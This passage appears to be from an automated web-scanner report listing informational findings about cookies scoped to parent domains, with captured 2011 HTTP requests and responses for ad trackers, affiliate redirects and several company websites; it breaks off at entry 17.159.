HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 42
Content-Type: image/gif
Content-Location: http://spe.atdmt.com/images/pixel.gif
Expires: 0
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001303692767-3995853; expires=Wednesday, 24-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=26DB680E69D6439A95B060D5EC15A682; expires=Friday, 11-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Mon, 25 Apr 2011 00:52:46 GMT
Connection: close

GIF89a.............!.......,...........2.;

17.147. http://track3.mybloglog.com/js/jsserv.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track3.mybloglog.com
Path:   /js/jsserv.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/jsserv.php?mblID=2008013116011951 HTTP/1.1
Host: track3.mybloglog.com
Proxy-Connection: keep-alive
Referer: http://reputation-watch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:38 GMT
Set-Cookie: BX=a84as5l6r9gb2&b=3&s=l5; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" policyref="http://www.mybloglog.com/w3c/p3p.xml"
Expires: Sun, 01 May 2011 00:00:00 GMT
Set-Cookie: mbl_sid=N2011042417333800; expires=Tue, 24-Apr-2012 00:33:38 GMT; path=/; domain=.mybloglog.com
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6761


<!--
var mbl_recent_visitor='';
var mbl_current_visitor='';
if(typeof(mbl_jsserv_loaded)=='undefined'){var mbl_jsserv_loaded=true;function m_r_e(obj,w,f){if(window.addEventListener){obj.addEventListe
...[SNIP]...

17.148. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apmebf.com
Path:   /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G?b=u4up%3DsupLm%2Bupqz5u5A%2B5tqr5%2B3q4063oq_03pq3uzsFG--ECDD-CG-EF--EC-DC-CGOPD%2663x%3Dt5514%25FM%25ER%25ER888.qo0z46yq3.q26urm9.o0y%25ERo0z46yq3%25ERxmzpuzs.qt5yx%25FR%25EHHq45m35%25FP%25EIo0y1mzAZmyq%25FPov_q4z1F3%3C%3Ct551%3A%2F%2F888.w2BArv.o0y%3AKC%2Foxuow-DLDDLID-DCJHDLKJ%3C%3CS%3C%3C HTTP/1.1
Host: www.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.apmebf.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 24 Apr 2011 03:10:07 GMT
Location: http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu%2Bsftpvsdf_psefsjoh45--3122-15-34--31-21-15DE2%26vsm%3Diuuqt%254B%253G%253Gxxx.fdpotvnfs.frvjgby.dpn%253Gdpotvnfs%253Gmboejoh.fiunm%254G%25366ftubsu%254E%2537dpnqbozObnf%254Edk_ftoq4s<dkp!x7ry-t2xepAz<iuuq%3A%2F%2Fxxx.lr0zgk.dpn%3A91%2Fdmjdl-2A22A72-21862A98<<H<<
Set-Cookie: LCLK=cjo!w6qx-s1wdo9y; domain=.apmebf.com; path=/; expires=Fri, 22-Apr-2016 03:10:07 GMT
Content-Type: text/html
Connection: close
Date: Sun, 24 Apr 2011 03:10:07 GMT
Content-Length: 983

<html>
<head><meta http-equiv="redirect" content="http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu
...[SNIP]...

17.149. http://www.apture.com/js/apture.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apture.com
Path:   /js/apture.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/apture.js?siteToken=4dGf14t HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Expires: Mon, 25 Apr 2011 01:37:27 GMT
Last-Modified: Mon, 25 Apr 2011 01:37:27 GMT
Etag: "8d945e580d999bbe5702f570b02fd4bf"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Set-Cookie: AC=SkiS2H7dvV; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
Content-Length: 3714
Date: Mon, 25 Apr 2011 01:37:27 GMT


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://www.infusionblog.com/";A.visitId=253300774889195;A.abtests={};A.userCookieId=null;
A.siteToken="4dG
...[SNIP]...

17.150. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emjcd.com
Path:   /5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu%2Bsftpvsdf_psefsjoh45--3122-15-34--31-21-15DE2%26vsm%3Diuuqt%254B%253G%253Gxxx.fdpotvnfs.frvjgby.dpn%253Gdpotvnfs%253Gmboejoh.fiunm%254G%25366ftubsu%254E%2537dpnqbozObnf%254Edk_ftoq4s%3Cdkp!x7ry-t2xepAz%3Ciuuq%3A%2F%2Fxxx.lr0zgk.dpn%3A91%2Fdmjdl-2A22A72-21862A98%3C%3CH%3C%3C HTTP/1.1
Host: www.emjcd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.emjcd.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 24 Apr 2011 03:10:08 GMT
Location: https://www.econsumer.equifax.com/consumer/landing.ehtml?%5estart=&companyName=cj_esnp3r&AID=10751987&PID=1911961&SID=gid9a+identity+theft+resource_ordering34--2011-04-23--20-10-04CD1
Set-Cookie: LCLK=cjo!w6qx-s1wdo9y; domain=.emjcd.com; path=/; expires=Fri, 22-Apr-2016 03:10:08 GMT
Set-Cookie: S=g14vo-36788-1303134591742-0g; domain=.emjcd.com; path=/; expires=Fri, 22-Apr-2016 03:10:08 GMT
Set-Cookie: PBLP=1501737:1911961:1303614608209; path=/; expires=Fri, 22-Apr-2016 03:10:08 GMT
Content-Type: text/html
Connection: close
Date: Sun, 24 Apr 2011 03:10:08 GMT
Content-Length: 517

<html>
<head><meta http-equiv="redirect" content="https://www.econsumer.equifax.com/consumer/landing.ehtml?%5estart=&amp;companyName=cj_esnp3r&amp;AID=10751987&amp;PID=1911961&amp;SID=gid9a+identity+t
...[SNIP]...

17.151. http://www.iis.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iis.net
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.iis.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: CSAnonymous=kKNEVJsCzAEkAAAAN2U2YmI0YzUtZWIwNC00YWVhLThiN2QtYjJiN2U1MTAzNWYx0; domain=iis.net; expires=Sun, 24-Apr-2011 16:19:04 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:59:03 GMT
Content-Length: 33782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   The Official M
...[SNIP]...

17.152. http://www.infusionsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; ISFunnel=ms; __v1192_vexclude=false; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.1.10.1303693620; __v1192_=46276302; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630
If-Modified-Since: Mon, 25 Apr 2011 01:06:42 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:37:00 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:37:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:23:40 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:23:40 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:37:00 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 30605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir
...[SNIP]...

17.153. http://www.infusionsoft.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /about

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.3.10.1303693620; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:06 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:39:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:25:46 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:39:05 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:39:06 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 21053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...

17.154. http://www.infusionsoft.com/clients  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /clients

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clients HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.5.10.1303693620

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:40:28 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:40:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:27:08 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:40:27 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:40:29 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31589


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...

17.155. http://www.infusionsoft.com/demo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /demo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /demo HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.1.10.1303693620; __v1192_=46276302; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:37:00 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:37:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:23:40 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:59 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:37:00 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 42382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...

17.156. http://www.infusionsoft.com/pricing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /pricing

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pricing HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionsoft.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.3.10.1303693620; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:20 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:39:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; expires=Thu, 18-Aug-2011 19:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:39:19 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; expires=Thu, 18-Aug-2011 19:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:39:20 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 29858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...

17.157. http://www.krypt.com/active/captcha.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /active/captcha.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /active/captcha.html?id=81bcc5596ecaa5f0f24c1589a925e557 HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://www.krypt.com/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cid=9b766d29f4a59d55b1ee0c2aaaa06184; __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.3.10.1303662879

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:14 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:17 GMT; path=/; domain=.krypt.com
Content-Length: 1650
Content-Type: image/jpeg

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

17.158. http://www.krypt.com/active/cart/cart-image.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /active/cart/cart-image.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /active/cart/cart-image.html HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://www.krypt.com/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cid=9b766d29f4a59d55b1ee0c2aaaa06184; __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.3.10.1303662879

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:05 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:11 GMT; path=/; domain=.krypt.com
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Length: 1051
Content-Type: image/png

.PNG
.
...IHDR...............'n....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

17.159. http://www.krypt.com/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /contact/

Issue detail

